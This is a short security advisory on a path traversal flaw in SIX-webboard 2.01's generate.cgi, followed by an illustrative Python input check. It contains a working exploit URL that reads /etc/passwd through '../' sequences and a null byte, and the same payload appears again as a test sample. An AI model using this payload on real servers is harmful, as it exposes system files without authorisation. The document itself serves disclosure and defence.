COMMAND
SIX-webboard
SYSTEMS AFFECTED
SIX-webboard 2.01
PROBLEM
'digitalseed' found the following. The sequences '..' and '/' are
not filtered while processing user input, so it is possible to supply
arbitrary values and retrieve files from the remote server that should
not normally be accessible. Exploit:
http://www.target.net/cgi-bin/webboard/generate.cgi?content=../../../../../../../../../etc/passwd%00&board=boardsname
Requesting the above URL outputs the contents of
/etc/passwd. Discovery by digitalseed and k$en0r.
SOLUTION
Nothing yet.
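
The input check that is missing from the behaviour described above, as an added example: it is not vendor code and not an official fix. It is written in Python for illustration; CONTENT_ROOT, the function names and the sample URLs are assumptions.

```python
import os
from urllib.parse import parse_qs, urlsplit

# Hypothetical directory holding the board's content files (assumption).
CONTENT_ROOT = "/var/www/webboard/content"


def safe_content_path(value, root=CONTENT_ROOT):
    """Map a decoded 'content' value to a path under root, or return None."""
    # A NUL byte (the %00 in the advisory's URL) ends the filename at the
    # C layer and would cut off anything placed after it.
    if not value or "\x00" in value:
        return None
    # The two sequences the advisory says are not filtered.
    if "/" in value or "\\" in value or ".." in value:
        return None
    # Defence in depth: canonicalise and confirm the result stays in root
    # (also catches a symlink inside root that points elsewhere).
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, value))
    if os.path.commonpath([real_root, candidate]) != real_root:
        return None
    return candidate


def check_request(url, root=CONTENT_ROOT):
    """Return the resolved path for a generate.cgi URL, or None if rejected."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    values = params.get("content", [])
    # Exactly one 'content' value is expected; duplicates are refused.
    if len(values) != 1:
        return None
    return safe_content_path(values[0], root)


# Constructed sample requests (www.example.test is a placeholder host).
SAMPLES = [
    "http://www.example.test/cgi-bin/webboard/generate.cgi?content=welcome.txt&board=boardsname",
    "http://www.example.test/cgi-bin/webboard/generate.cgi?content=../../../../etc/passwd%00&board=boardsname",
    "http://www.example.test/cgi-bin/webboard/generate.cgi?content=welcome.txt%00.html&board=boardsname",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(check_request(url), "<-", url)
```

Only the first sample resolves to a path; the other two are rejected before any file is opened.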